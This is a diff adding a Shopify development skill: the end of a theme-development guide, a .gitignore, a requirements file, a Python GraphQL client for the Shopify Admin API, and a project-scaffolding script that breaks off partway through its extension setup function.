|
||||
shopify theme init
|
||||
|
||||
# Choose Dawn (reference theme) or blank
|
||||
```
|
||||
|
||||
### Local Development
|
||||
|
||||
```bash
|
||||
# Start local server
|
||||
shopify theme dev
|
||||
|
||||
# Preview at http://localhost:9292
|
||||
# Changes auto-sync to development theme
|
||||
```
|
||||
|
||||
### Pull Theme
|
||||
|
||||
```bash
|
||||
# Pull live theme
|
||||
shopify theme pull --live
|
||||
|
||||
# Pull specific theme
|
||||
shopify theme pull --theme=123456789
|
||||
|
||||
# Pull only templates
|
||||
shopify theme pull --only=templates
|
||||
```
|
||||
|
||||
### Push Theme
|
||||
|
||||
```bash
|
||||
# Push to development theme
|
||||
shopify theme push --development
|
||||
|
||||
# Create new unpublished theme
|
||||
shopify theme push --unpublished
|
||||
|
||||
# Push specific files
|
||||
shopify theme push --only=sections,snippets
|
||||
```
|
||||
|
||||
### Theme Check
|
||||
|
||||
Lint theme code:
|
||||
```bash
|
||||
shopify theme check
|
||||
shopify theme check --auto-correct
|
||||
```
|
||||
|
||||
## Common Patterns
|
||||
|
||||
### Product Form with Variants
|
||||
|
||||
```liquid
|
||||
{% form 'product', product %}
|
||||
{% unless product.has_only_default_variant %}
|
||||
{% for option in product.options_with_values %}
|
||||
<div class="product-option">
|
||||
<label>{{ option.name }}</label>
|
||||
<select name="options[{{ option.name }}]">
|
||||
{% for value in option.values %}
|
||||
<option value="{{ value }}">{{ value }}</option>
|
||||
{% endfor %}
|
||||
</select>
|
||||
</div>
|
||||
{% endfor %}
|
||||
{% endunless %}
|
||||
|
||||
<input type="hidden" name="id" value="{{ product.selected_or_first_available_variant.id }}">
|
||||
<input type="number" name="quantity" value="1" min="1">
|
||||
|
||||
<button type="submit" {% unless product.available %}disabled{% endunless %}>
|
||||
{% if product.available %}Add to Cart{% else %}Sold Out{% endif %}
|
||||
</button>
|
||||
{% endform %}
|
||||
```
|
||||
|
||||
### Pagination
|
||||
|
||||
```liquid
|
||||
{% paginate collection.products by 12 %}
|
||||
{% for product in collection.products %}
|
||||
{% render 'product-card', product: product %}
|
||||
{% endfor %}
|
||||
|
||||
{% if paginate.pages > 1 %}
|
||||
<div class="pagination">
|
||||
{% if paginate.previous %}
|
||||
<a href="{{ paginate.previous.url }}">Previous</a>
|
||||
{% endif %}
|
||||
|
||||
{% for part in paginate.parts %}
|
||||
{% if part.is_link %}
|
||||
<a href="{{ part.url }}">{{ part.title }}</a>
|
||||
{% else %}
|
||||
<span class="current">{{ part.title }}</span>
|
||||
{% endif %}
|
||||
{% endfor %}
|
||||
|
||||
{% if paginate.next %}
|
||||
<a href="{{ paginate.next.url }}">Next</a>
|
||||
{% endif %}
|
||||
</div>
|
||||
{% endif %}
|
||||
{% endpaginate %}
|
||||
```
|
||||
|
||||
### Cart AJAX
|
||||
|
||||
```javascript
|
||||
// Add to cart
|
||||
fetch('/cart/add.js', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
id: variantId,
|
||||
quantity: 1
|
||||
})
|
||||
})
|
||||
.then(res => res.json())
|
||||
.then(item => console.log('Added:', item));
|
||||
|
||||
// Get cart
|
||||
fetch('/cart.js')
|
||||
.then(res => res.json())
|
||||
.then(cart => console.log('Cart:', cart));
|
||||
|
||||
// Update cart
|
||||
fetch('/cart/change.js', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
id: lineItemKey,
|
||||
quantity: 2
|
||||
})
|
||||
})
|
||||
.then(res => res.json());
|
||||
```
|
||||
|
||||
## Metafields in Themes
|
||||
|
||||
Access custom data:
|
||||
|
||||
```liquid
|
||||
{{ product.metafields.custom.care_instructions }}
|
||||
{{ product.metafields.custom.material.value }}
|
||||
|
||||
{% if product.metafields.custom.featured %}
|
||||
<span class="badge">Featured</span>
|
||||
{% endif %}
|
||||
```
|
||||
|
||||
## Best Practices
|
||||
|
||||
**Performance:**
|
||||
- Optimize images (use appropriate sizes)
|
||||
- Minimize Liquid logic complexity
|
||||
- Use lazy loading for images
|
||||
- Defer non-critical JavaScript
|
||||
|
||||
**Accessibility:**
|
||||
- Use semantic HTML
|
||||
- Include alt text for images
|
||||
- Support keyboard navigation
|
||||
- Ensure sufficient color contrast
|
||||
|
||||
**SEO:**
|
||||
- Use descriptive page titles
|
||||
- Include meta descriptions
|
||||
- Structure content with headings
|
||||
- Implement schema markup
|
||||
|
||||
**Code Quality:**
|
||||
- Follow Shopify theme guidelines
|
||||
- Use consistent naming conventions
|
||||
- Comment complex logic
|
||||
- Keep sections focused and reusable
|
||||
|
||||
## Resources
|
||||
|
||||
- Theme Development: https://shopify.dev/docs/themes
|
||||
- Liquid Reference: https://shopify.dev/docs/api/liquid
|
||||
- Dawn Theme: https://github.com/Shopify/dawn
|
||||
- Theme Check: https://shopify.dev/docs/themes/tools/theme-check
|
||||
49
skills/shopify-development/scripts/.gitignore
vendored
Normal file
49
skills/shopify-development/scripts/.gitignore
vendored
Normal file
@@ -0,0 +1,49 @@
|
||||
# Python
|
||||
__pycache__/
|
||||
*.py[cod]
|
||||
*$py.class
|
||||
*.so
|
||||
.Python
|
||||
build/
|
||||
develop-eggs/
|
||||
dist/
|
||||
downloads/
|
||||
eggs/
|
||||
.eggs/
|
||||
lib/
|
||||
lib64/
|
||||
parts/
|
||||
sdist/
|
||||
var/
|
||||
wheels/
|
||||
*.egg-info/
|
||||
.installed.cfg
|
||||
*.egg
|
||||
|
||||
# Testing
|
||||
.coverage
|
||||
.pytest_cache/
|
||||
htmlcov/
|
||||
.tox/
|
||||
.nox/
|
||||
coverage.xml
|
||||
*.cover
|
||||
*.py,cover
|
||||
|
||||
# Environments
|
||||
.env
|
||||
.venv
|
||||
env/
|
||||
venv/
|
||||
ENV/
|
||||
|
||||
# IDE
|
||||
.idea/
|
||||
.vscode/
|
||||
*.swp
|
||||
*.swo
|
||||
*~
|
||||
|
||||
# OS
|
||||
.DS_Store
|
||||
Thumbs.db
|
||||
19
skills/shopify-development/scripts/requirements.txt
Normal file
19
skills/shopify-development/scripts/requirements.txt
Normal file
@@ -0,0 +1,19 @@
|
||||
# Shopify Skill Dependencies
|
||||
# Python 3.10+ required
|
||||
|
||||
# No Python package dependencies - uses only standard library
|
||||
|
||||
# Testing dependencies (dev)
|
||||
pytest>=8.0.0
|
||||
pytest-cov>=4.1.0
|
||||
pytest-mock>=3.12.0
|
||||
|
||||
# Note: This script requires the Shopify CLI tool
|
||||
# Install Shopify CLI:
|
||||
# npm install -g @shopify/cli @shopify/theme
|
||||
# or via Homebrew (macOS):
|
||||
# brew tap shopify/shopify
|
||||
# brew install shopify-cli
|
||||
#
|
||||
# Authenticate with:
|
||||
# shopify auth login
|
||||
428
skills/shopify-development/scripts/shopify_graphql.py
Normal file
428
skills/shopify-development/scripts/shopify_graphql.py
Normal file
@@ -0,0 +1,428 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Shopify GraphQL Utilities
|
||||
|
||||
Helper functions for common Shopify GraphQL operations.
|
||||
Provides query templates, pagination helpers, and rate limit handling.
|
||||
|
||||
Usage:
|
||||
from shopify_graphql import ShopifyGraphQL
|
||||
|
||||
client = ShopifyGraphQL(shop_domain, access_token)
|
||||
products = client.get_products(first=10)
|
||||
"""
|
||||
|
||||
import os
|
||||
import time
|
||||
import json
|
||||
from typing import Dict, List, Optional, Any, Generator
|
||||
from dataclasses import dataclass
|
||||
from urllib.request import Request, urlopen
|
||||
from urllib.error import HTTPError
|
||||
|
||||
|
||||
# API Configuration
|
||||
API_VERSION = "2026-01"
|
||||
MAX_RETRIES = 3
|
||||
RETRY_DELAY = 1.0 # seconds
|
||||
|
||||
|
||||
@dataclass
|
||||
class GraphQLResponse:
|
||||
"""Container for GraphQL response data."""
|
||||
data: Optional[Dict[str, Any]] = None
|
||||
errors: Optional[List[Dict[str, Any]]] = None
|
||||
extensions: Optional[Dict[str, Any]] = None
|
||||
|
||||
@property
|
||||
def is_success(self) -> bool:
|
||||
return self.errors is None or len(self.errors) == 0
|
||||
|
||||
@property
|
||||
def query_cost(self) -> Optional[int]:
|
||||
"""Get the actual query cost from extensions."""
|
||||
if self.extensions and 'cost' in self.extensions:
|
||||
return self.extensions['cost'].get('actualQueryCost')
|
||||
return None
|
||||
|
||||
|
||||
class ShopifyGraphQL:
|
||||
"""
|
||||
Shopify GraphQL API client with built-in utilities.
|
||||
|
||||
Features:
|
||||
- Query templates for common operations
|
||||
- Automatic pagination
|
||||
- Rate limit handling with exponential backoff
|
||||
- Response parsing helpers
|
||||
"""
|
||||
|
||||
def __init__(self, shop_domain: str, access_token: str):
|
||||
"""
|
||||
Initialize the GraphQL client.
|
||||
|
||||
Args:
|
||||
shop_domain: Store domain (e.g., 'my-store.myshopify.com')
|
||||
access_token: Admin API access token
|
||||
"""
|
||||
self.shop_domain = shop_domain.replace('https://', '').replace('http://', '')
|
||||
self.access_token = access_token
|
||||
self.base_url = f"https://{self.shop_domain}/admin/api/{API_VERSION}/graphql.json"
|
||||
|
||||
def execute(self, query: str, variables: Optional[Dict] = None) -> GraphQLResponse:
|
||||
"""
|
||||
Execute a GraphQL query/mutation.
|
||||
|
||||
Args:
|
||||
query: GraphQL query string
|
||||
variables: Query variables
|
||||
|
||||
Returns:
|
||||
GraphQLResponse object
|
||||
"""
|
||||
payload = {"query": query}
|
||||
if variables:
|
||||
payload["variables"] = variables
|
||||
|
||||
headers = {
|
||||
"Content-Type": "application/json",
|
||||
"X-Shopify-Access-Token": self.access_token
|
||||
}
|
||||
|
||||
for attempt in range(MAX_RETRIES):
|
||||
try:
|
||||
request = Request(
|
||||
self.base_url,
|
||||
data=json.dumps(payload).encode('utf-8'),
|
||||
headers=headers,
|
||||
method='POST'
|
||||
)
|
||||
|
||||
with urlopen(request, timeout=30) as response:
|
||||
result = json.loads(response.read().decode('utf-8'))
|
||||
return GraphQLResponse(
|
||||
data=result.get('data'),
|
||||
errors=result.get('errors'),
|
||||
extensions=result.get('extensions')
|
||||
)
|
||||
|
||||
except HTTPError as e:
|
||||
if e.code == 429: # Rate limited
|
||||
delay = RETRY_DELAY * (2 ** attempt)
|
||||
print(f"Rate limited. Retrying in {delay}s...")
|
||||
time.sleep(delay)
|
||||
continue
|
||||
raise
|
||||
except Exception as e:
|
||||
if attempt == MAX_RETRIES - 1:
|
||||
raise
|
||||
time.sleep(RETRY_DELAY)
|
||||
|
||||
return GraphQLResponse(errors=[{"message": "Max retries exceeded"}])
|
||||
|
||||
# ==================== Query Templates ====================
|
||||
|
||||
def get_products(
|
||||
self,
|
||||
first: int = 10,
|
||||
query: Optional[str] = None,
|
||||
after: Optional[str] = None
|
||||
) -> GraphQLResponse:
|
||||
"""
|
||||
Query products with pagination.
|
||||
|
||||
Args:
|
||||
first: Number of products to fetch (max 250)
|
||||
query: Optional search query
|
||||
after: Cursor for pagination
|
||||
"""
|
||||
gql = """
|
||||
query GetProducts($first: Int!, $query: String, $after: String) {
|
||||
products(first: $first, query: $query, after: $after) {
|
||||
edges {
|
||||
node {
|
||||
id
|
||||
title
|
||||
handle
|
||||
status
|
||||
totalInventory
|
||||
variants(first: 5) {
|
||||
edges {
|
||||
node {
|
||||
id
|
||||
title
|
||||
price
|
||||
inventoryQuantity
|
||||
sku
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
cursor
|
||||
}
|
||||
pageInfo {
|
||||
hasNextPage
|
||||
endCursor
|
||||
}
|
||||
}
|
||||
}
|
||||
"""
|
||||
return self.execute(gql, {"first": first, "query": query, "after": after})
|
||||
|
||||
def get_orders(
|
||||
self,
|
||||
first: int = 10,
|
||||
query: Optional[str] = None,
|
||||
after: Optional[str] = None
|
||||
) -> GraphQLResponse:
|
||||
"""
|
||||
Query orders with pagination.
|
||||
|
||||
Args:
|
||||
first: Number of orders to fetch (max 250)
|
||||
query: Optional search query (e.g., "financial_status:paid")
|
||||
after: Cursor for pagination
|
||||
"""
|
||||
gql = """
|
||||
query GetOrders($first: Int!, $query: String, $after: String) {
|
||||
orders(first: $first, query: $query, after: $after) {
|
||||
edges {
|
||||
node {
|
||||
id
|
||||
name
|
||||
createdAt
|
||||
displayFinancialStatus
|
||||
displayFulfillmentStatus
|
||||
totalPriceSet {
|
||||
shopMoney { amount currencyCode }
|
||||
}
|
||||
customer {
|
||||
id
|
||||
firstName
|
||||
lastName
|
||||
}
|
||||
lineItems(first: 5) {
|
||||
edges {
|
||||
node {
|
||||
title
|
||||
quantity
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
cursor
|
||||
}
|
||||
pageInfo {
|
||||
hasNextPage
|
||||
endCursor
|
||||
}
|
||||
}
|
||||
}
|
||||
"""
|
||||
return self.execute(gql, {"first": first, "query": query, "after": after})
|
||||
|
||||
def get_customers(
|
||||
self,
|
||||
first: int = 10,
|
||||
query: Optional[str] = None,
|
||||
after: Optional[str] = None
|
||||
) -> GraphQLResponse:
|
||||
"""
|
||||
Query customers with pagination.
|
||||
|
||||
Args:
|
||||
first: Number of customers to fetch (max 250)
|
||||
query: Optional search query
|
||||
after: Cursor for pagination
|
||||
"""
|
||||
gql = """
|
||||
query GetCustomers($first: Int!, $query: String, $after: String) {
|
||||
customers(first: $first, query: $query, after: $after) {
|
||||
edges {
|
||||
node {
|
||||
id
|
||||
firstName
|
||||
lastName
|
||||
displayName
|
||||
defaultEmailAddress {
|
||||
emailAddress
|
||||
}
|
||||
numberOfOrders
|
||||
amountSpent {
|
||||
amount
|
||||
currencyCode
|
||||
}
|
||||
}
|
||||
cursor
|
||||
}
|
||||
pageInfo {
|
||||
hasNextPage
|
||||
endCursor
|
||||
}
|
||||
}
|
||||
}
|
||||
"""
|
||||
return self.execute(gql, {"first": first, "query": query, "after": after})
|
||||
|
||||
def set_metafields(self, metafields: List[Dict]) -> GraphQLResponse:
|
||||
"""
|
||||
Set metafields on resources.
|
||||
|
||||
Args:
|
||||
metafields: List of metafield inputs, each containing:
|
||||
- ownerId: Resource GID
|
||||
- namespace: Metafield namespace
|
||||
- key: Metafield key
|
||||
- value: Metafield value
|
||||
- type: Metafield type
|
||||
"""
|
||||
gql = """
|
||||
mutation SetMetafields($metafields: [MetafieldsSetInput!]!) {
|
||||
metafieldsSet(metafields: $metafields) {
|
||||
metafields {
|
||||
id
|
||||
namespace
|
||||
key
|
||||
value
|
||||
}
|
||||
userErrors {
|
||||
field
|
||||
message
|
||||
}
|
||||
}
|
||||
}
|
||||
"""
|
||||
return self.execute(gql, {"metafields": metafields})
|
||||
|
||||
# ==================== Pagination Helpers ====================
|
||||
|
||||
def paginate_products(
|
||||
self,
|
||||
batch_size: int = 50,
|
||||
query: Optional[str] = None
|
||||
) -> Generator[Dict, None, None]:
|
||||
"""
|
||||
Generator that yields all products with automatic pagination.
|
||||
|
||||
Args:
|
||||
batch_size: Products per request (max 250)
|
||||
query: Optional search query
|
||||
|
||||
Yields:
|
||||
Product dictionaries
|
||||
"""
|
||||
cursor = None
|
||||
while True:
|
||||
response = self.get_products(first=batch_size, query=query, after=cursor)
|
||||
|
||||
if not response.is_success or not response.data:
|
||||
break
|
||||
|
||||
products = response.data.get('products', {})
|
||||
edges = products.get('edges', [])
|
||||
|
||||
for edge in edges:
|
||||
yield edge['node']
|
||||
|
||||
page_info = products.get('pageInfo', {})
|
||||
if not page_info.get('hasNextPage'):
|
||||
break
|
||||
|
||||
cursor = page_info.get('endCursor')
|
||||
|
||||
def paginate_orders(
|
||||
self,
|
||||
batch_size: int = 50,
|
||||
query: Optional[str] = None
|
||||
) -> Generator[Dict, None, None]:
|
||||
"""
|
||||
Generator that yields all orders with automatic pagination.
|
||||
|
||||
Args:
|
||||
batch_size: Orders per request (max 250)
|
||||
query: Optional search query
|
||||
|
||||
Yields:
|
||||
Order dictionaries
|
||||
"""
|
||||
cursor = None
|
||||
while True:
|
||||
response = self.get_orders(first=batch_size, query=query, after=cursor)
|
||||
|
||||
if not response.is_success or not response.data:
|
||||
break
|
||||
|
||||
orders = response.data.get('orders', {})
|
||||
edges = orders.get('edges', [])
|
||||
|
||||
for edge in edges:
|
||||
yield edge['node']
|
||||
|
||||
page_info = orders.get('pageInfo', {})
|
||||
if not page_info.get('hasNextPage'):
|
||||
break
|
||||
|
||||
cursor = page_info.get('endCursor')
|
||||
|
||||
|
||||
# ==================== Utility Functions ====================
|
||||
|
||||
def extract_id(gid: str) -> str:
|
||||
"""
|
||||
Extract numeric ID from Shopify GID.
|
||||
|
||||
Args:
|
||||
gid: Global ID (e.g., 'gid://shopify/Product/123')
|
||||
|
||||
Returns:
|
||||
Numeric ID string (e.g., '123')
|
||||
"""
|
||||
return gid.split('/')[-1] if gid else ''
|
||||
|
||||
|
||||
def build_gid(resource_type: str, id: str) -> str:
|
||||
"""
|
||||
Build Shopify GID from resource type and ID.
|
||||
|
||||
Args:
|
||||
resource_type: Resource type (e.g., 'Product', 'Order')
|
||||
id: Numeric ID
|
||||
|
||||
Returns:
|
||||
Global ID (e.g., 'gid://shopify/Product/123')
|
||||
"""
|
||||
return f"gid://shopify/{resource_type}/{id}"
|
||||
|
||||
|
||||
# ==================== Example Usage ====================
|
||||
|
||||
def main():
|
||||
"""Example usage of ShopifyGraphQL client."""
|
||||
import os
|
||||
|
||||
# Load from environment
|
||||
shop = os.environ.get('SHOP_DOMAIN', 'your-store.myshopify.com')
|
||||
token = os.environ.get('SHOPIFY_ACCESS_TOKEN', '')
|
||||
|
||||
if not token:
|
||||
print("Set SHOPIFY_ACCESS_TOKEN environment variable")
|
||||
return
|
||||
|
||||
client = ShopifyGraphQL(shop, token)
|
||||
|
||||
# Example: Get first 5 products
|
||||
print("Fetching products...")
|
||||
response = client.get_products(first=5)
|
||||
|
||||
if response.is_success:
|
||||
products = response.data['products']['edges']
|
||||
for edge in products:
|
||||
product = edge['node']
|
||||
print(f" - {product['title']} ({product['status']})")
|
||||
print(f"\nQuery cost: {response.query_cost}")
|
||||
else:
|
||||
print(f"Errors: {response.errors}")
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
||||
441
skills/shopify-development/scripts/shopify_init.py
Normal file
441
skills/shopify-development/scripts/shopify_init.py
Normal file
@@ -0,0 +1,441 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Shopify Project Initialization Script
|
||||
|
||||
Interactive script to scaffold Shopify apps, extensions, or themes.
|
||||
Supports environment variable loading from multiple locations.
|
||||
"""
|
||||
|
||||
import os
|
||||
import sys
|
||||
import json
|
||||
import subprocess
|
||||
from pathlib import Path
|
||||
from typing import Dict, Optional, List
|
||||
from dataclasses import dataclass
|
||||
|
||||
|
||||
@dataclass
|
||||
class EnvConfig:
|
||||
"""Environment configuration container."""
|
||||
shopify_api_key: Optional[str] = None
|
||||
shopify_api_secret: Optional[str] = None
|
||||
shop_domain: Optional[str] = None
|
||||
scopes: Optional[str] = None
|
||||
|
||||
|
||||
class EnvLoader:
|
||||
"""Load environment variables from multiple sources in priority order."""
|
||||
|
||||
@staticmethod
|
||||
def load_env_file(filepath: Path) -> Dict[str, str]:
|
||||
"""
|
||||
Load environment variables from .env file.
|
||||
|
||||
Args:
|
||||
filepath: Path to .env file
|
||||
|
||||
Returns:
|
||||
Dictionary of environment variables
|
||||
"""
|
||||
env_vars = {}
|
||||
if not filepath.exists():
|
||||
return env_vars
|
||||
|
||||
try:
|
||||
with open(filepath, 'r') as f:
|
||||
for line in f:
|
||||
line = line.strip()
|
||||
if line and not line.startswith('#') and '=' in line:
|
||||
key, value = line.split('=', 1)
|
||||
env_vars[key.strip()] = value.strip().strip('"').strip("'")
|
||||
except Exception as e:
|
||||
print(f"Warning: Failed to load {filepath}: {e}")
|
||||
|
||||
return env_vars
|
||||
|
||||
@staticmethod
|
||||
def get_env_paths(skill_dir: Path) -> List[Path]:
|
||||
"""
|
||||
Get list of .env file paths in priority order.
|
||||
|
||||
Works with any AI tool directory structure:
|
||||
- .agent/skills/ (universal)
|
||||
- .claude/skills/ (Claude Code)
|
||||
- .gemini/skills/ (Gemini CLI)
|
||||
- .cursor/skills/ (Cursor)
|
||||
|
||||
Priority: process.env > skill/.env > skills/.env > agent_dir/.env
|
||||
|
||||
Args:
|
||||
skill_dir: Path to skill directory
|
||||
|
||||
Returns:
|
||||
List of .env file paths
|
||||
"""
|
||||
paths = []
|
||||
|
||||
# skill/.env
|
||||
skill_env = skill_dir / '.env'
|
||||
if skill_env.exists():
|
||||
paths.append(skill_env)
|
||||
|
||||
# skills/.env
|
||||
skills_env = skill_dir.parent / '.env'
|
||||
if skills_env.exists():
|
||||
paths.append(skills_env)
|
||||
|
||||
# agent_dir/.env (e.g., .agent, .claude, .gemini, .cursor)
|
||||
agent_env = skill_dir.parent.parent / '.env'
|
||||
if agent_env.exists():
|
||||
paths.append(agent_env)
|
||||
|
||||
return paths
|
||||
|
||||
@staticmethod
|
||||
def load_config(skill_dir: Path) -> EnvConfig:
|
||||
"""
|
||||
Load configuration from environment variables.
|
||||
|
||||
Works with any AI tool directory structure.
|
||||
Priority: process.env > skill/.env > skills/.env > agent_dir/.env
|
||||
|
||||
Args:
|
||||
skill_dir: Path to skill directory
|
||||
|
||||
Returns:
|
||||
EnvConfig object
|
||||
"""
|
||||
config = EnvConfig()
|
||||
|
||||
# Load from .env files (reverse priority order)
|
||||
for env_path in reversed(EnvLoader.get_env_paths(skill_dir)):
|
||||
env_vars = EnvLoader.load_env_file(env_path)
|
||||
if 'SHOPIFY_API_KEY' in env_vars:
|
||||
config.shopify_api_key = env_vars['SHOPIFY_API_KEY']
|
||||
if 'SHOPIFY_API_SECRET' in env_vars:
|
||||
config.shopify_api_secret = env_vars['SHOPIFY_API_SECRET']
|
||||
if 'SHOP_DOMAIN' in env_vars:
|
||||
config.shop_domain = env_vars['SHOP_DOMAIN']
|
||||
if 'SCOPES' in env_vars:
|
||||
config.scopes = env_vars['SCOPES']
|
||||
|
||||
# Override with process environment (highest priority)
|
||||
if 'SHOPIFY_API_KEY' in os.environ:
|
||||
config.shopify_api_key = os.environ['SHOPIFY_API_KEY']
|
||||
if 'SHOPIFY_API_SECRET' in os.environ:
|
||||
config.shopify_api_secret = os.environ['SHOPIFY_API_SECRET']
|
||||
if 'SHOP_DOMAIN' in os.environ:
|
||||
config.shop_domain = os.environ['SHOP_DOMAIN']
|
||||
if 'SCOPES' in os.environ:
|
||||
config.scopes = os.environ['SCOPES']
|
||||
|
||||
return config
|
||||
|
||||
|
||||
class ShopifyInitializer:
|
||||
"""Initialize Shopify projects."""
|
||||
|
||||
def __init__(self, config: EnvConfig):
|
||||
"""
|
||||
Initialize ShopifyInitializer.
|
||||
|
||||
Args:
|
||||
config: Environment configuration
|
||||
"""
|
||||
self.config = config
|
||||
|
||||
def prompt(self, message: str, default: Optional[str] = None) -> str:
|
||||
"""
|
||||
Prompt user for input.
|
||||
|
||||
Args:
|
||||
message: Prompt message
|
||||
default: Default value
|
||||
|
||||
Returns:
|
||||
User input or default
|
||||
"""
|
||||
if default:
|
||||
message = f"{message} [{default}]"
|
||||
user_input = input(f"{message}: ").strip()
|
||||
return user_input if user_input else (default or '')
|
||||
|
||||
def select_option(self, message: str, options: List[str]) -> str:
|
||||
"""
|
||||
Prompt user to select from options.
|
||||
|
||||
Args:
|
||||
message: Prompt message
|
||||
options: List of options
|
||||
|
||||
Returns:
|
||||
Selected option
|
||||
"""
|
||||
print(f"\n{message}")
|
||||
for i, option in enumerate(options, 1):
|
||||
print(f"{i}. {option}")
|
||||
|
||||
while True:
|
||||
try:
|
||||
choice = int(input("Select option: ").strip())
|
||||
if 1 <= choice <= len(options):
|
||||
return options[choice - 1]
|
||||
print(f"Please select 1-{len(options)}")
|
||||
except (ValueError, KeyboardInterrupt):
|
||||
print("Invalid input")
|
||||
|
||||
def check_cli_installed(self) -> bool:
|
||||
"""
|
||||
Check if Shopify CLI is installed.
|
||||
|
||||
Returns:
|
||||
True if installed, False otherwise
|
||||
"""
|
||||
try:
|
||||
result = subprocess.run(
|
||||
['shopify', 'version'],
|
||||
capture_output=True,
|
||||
text=True,
|
||||
timeout=5
|
||||
)
|
||||
return result.returncode == 0
|
||||
except (subprocess.SubprocessError, FileNotFoundError):
|
||||
return False
|
||||
|
||||
def create_app_config(self, project_dir: Path, app_name: str, scopes: str) -> None:
|
||||
"""
|
||||
Create shopify.app.toml configuration file.
|
||||
|
||||
Args:
|
||||
project_dir: Project directory
|
||||
app_name: Application name
|
||||
scopes: Access scopes
|
||||
"""
|
||||
config_content = f"""# Shopify App Configuration
|
||||
name = "{app_name}"
|
||||
client_id = "{self.config.shopify_api_key or 'YOUR_API_KEY'}"
|
||||
application_url = "https://your-app.com"
|
||||
embedded = true
|
||||
|
||||
[build]
|
||||
automatically_update_urls_on_dev = true
|
||||
dev_store_url = "{self.config.shop_domain or 'your-store.myshopify.com'}"
|
||||
|
||||
[access_scopes]
|
||||
scopes = "{scopes}"
|
||||
|
||||
[webhooks]
|
||||
api_version = "2026-01"
|
||||
|
||||
[[webhooks.subscriptions]]
|
||||
topics = ["app/uninstalled"]
|
||||
uri = "/webhooks/app/uninstalled"
|
||||
|
||||
[webhooks.privacy_compliance]
|
||||
customer_data_request_url = "/webhooks/gdpr/data-request"
|
||||
customer_deletion_url = "/webhooks/gdpr/customer-deletion"
|
||||
shop_deletion_url = "/webhooks/gdpr/shop-deletion"
|
||||
"""
|
||||
config_path = project_dir / 'shopify.app.toml'
|
||||
config_path.write_text(config_content)
|
||||
print(f"✓ Created {config_path}")
|
||||
|
||||
def create_extension_config(self, project_dir: Path, extension_name: str, extension_type: str) -> None:
|
||||
"""
|
||||
Create shopify.extension.toml configuration file.
|
||||
|
||||
Args:
|
||||
project_dir: Project directory
|
||||
extension_name: Extension name
|
||||
extension_type: Extension type
|
||||
"""
|
||||
target_map = {
|
||||
'checkout': 'purchase.checkout.block.render',
|
||||
'admin_action': 'admin.product-details.action.render',
|
||||
'admin_block': 'admin.product-details.block.render',
|
||||
'pos': 'pos.home.tile.render',
|
||||
'function': 'function',
|
||||
'customer_account': 'customer-account.order-status.block.render',
|
||||
'theme_app': 'theme-app-extension'
|
||||
}
|
||||
|
||||
config_content = f"""name = "{extension_name}"
|
||||
type = "ui_extension"
|
||||
handle = "{extension_name.lower().replace(' ', '-')}"
|
||||
|
||||
[extension_points]
|
||||
api_version = "2026-01"
|
||||
|
||||
[[extension_points.targets]]
|
||||
target = "{target_map.get(extension_type, 'purchase.checkout.block.render')}"
|
||||
|
||||
[capabilities]
|
||||
network_access = true
|
||||
api_access = true
|
||||
"""
|
||||
config_path = project_dir / 'shopify.extension.toml'
|
||||
config_path.write_text(config_content)
|
||||
print(f"✓ Created {config_path}")
|
||||
|
||||
def create_readme(self, project_dir: Path, project_type: str, project_name: str) -> None:
|
||||
"""
|
||||
Create README.md file.
|
||||
|
||||
Args:
|
||||
project_dir: Project directory
|
||||
project_type: Project type (app/extension/theme)
|
||||
project_name: Project name
|
||||
"""
|
||||
content = f"""# {project_name}
|
||||
|
||||
Shopify {project_type.capitalize()} project.
|
||||
|
||||
## Setup
|
||||
|
||||
```bash
|
||||
# Install dependencies
|
||||
npm install
|
||||
|
||||
# Start development
|
||||
shopify {project_type} dev
|
||||
```
|
||||
|
||||
## Deployment
|
||||
|
||||
```bash
|
||||
# Deploy to Shopify
|
||||
shopify {project_type} deploy
|
||||
```
|
||||
|
||||
## Resources
|
||||
|
||||
- [Shopify Documentation](https://shopify.dev/docs)
|
||||
- [Shopify CLI](https://shopify.dev/docs/api/shopify-cli)
|
||||
"""
|
||||
readme_path = project_dir / 'README.md'
|
||||
readme_path.write_text(content)
|
||||
print(f"✓ Created {readme_path}")
|
||||
|
||||
def init_app(self) -> None:
|
||||
"""Initialize Shopify app project."""
|
||||
print("\n=== Shopify App Initialization ===\n")
|
||||
|
||||
app_name = self.prompt("App name", "my-shopify-app")
|
||||
scopes = self.prompt("Access scopes", self.config.scopes or "read_products,write_products")
|
||||
|
||||
project_dir = Path.cwd() / app_name
|
||||
project_dir.mkdir(exist_ok=True)
|
||||
|
||||
print(f"\nCreating app in {project_dir}...")
|
||||
|
||||
self.create_app_config(project_dir, app_name, scopes)
|
||||
self.create_readme(project_dir, "app", app_name)
|
||||
|
||||
# Create basic package.json
|
||||
package_json = {
|
||||
"name": app_name.lower().replace(' ', '-'),
|
||||
"version": "1.0.0",
|
||||
"scripts": {
|
||||
"dev": "shopify app dev",
|
||||
"deploy": "shopify app deploy"
|
||||
}
|
||||
}
|
||||
(project_dir / 'package.json').write_text(json.dumps(package_json, indent=2))
|
||||
print(f"✓ Created package.json")
|
||||
|
||||
print(f"\n✓ App '{app_name}' initialized successfully!")
|
||||
print(f"\nNext steps:")
|
||||
print(f" cd {app_name}")
|
||||
print(f" npm install")
|
||||
print(f" shopify app dev")
|
||||
|
||||
def init_extension(self) -> None:
|
||||
"""Initialize Shopify extension project."""
|
||||
print("\n=== Shopify Extension Initialization ===\n")
|
||||
|
||||
extension_types = [
|
||||
'checkout',
|
||||
'admin_action',
|
||||
'admin_block',
|
||||
'pos',
|
||||
'function',
|
||||
'customer_account',
|
||||
'theme_app'
|
||||
]
|
||||
extension_type = self.select_option("Select extension type", extension_types)
|
||||
|
||||
extension_name = self.prompt("Extension name", "my-extension")
|
||||
|
||||
project_dir = Path.cwd() / extension_name
|
||||
project_dir.mkdir(exist_ok=True)
|
||||
|
||||
print(f"\nCreating extension in {project_dir}...")
|
||||
|
||||
self.create_extension_config(project_dir, extension_name, extension_type)
|
||||
self.create_readme(project_dir, "extension", extension_name)
|
||||
|
||||
print(f"\n✓ Extension '{extension_name}' initialized successfully!")
|
||||
print(f"\nNext steps:")
|
||||
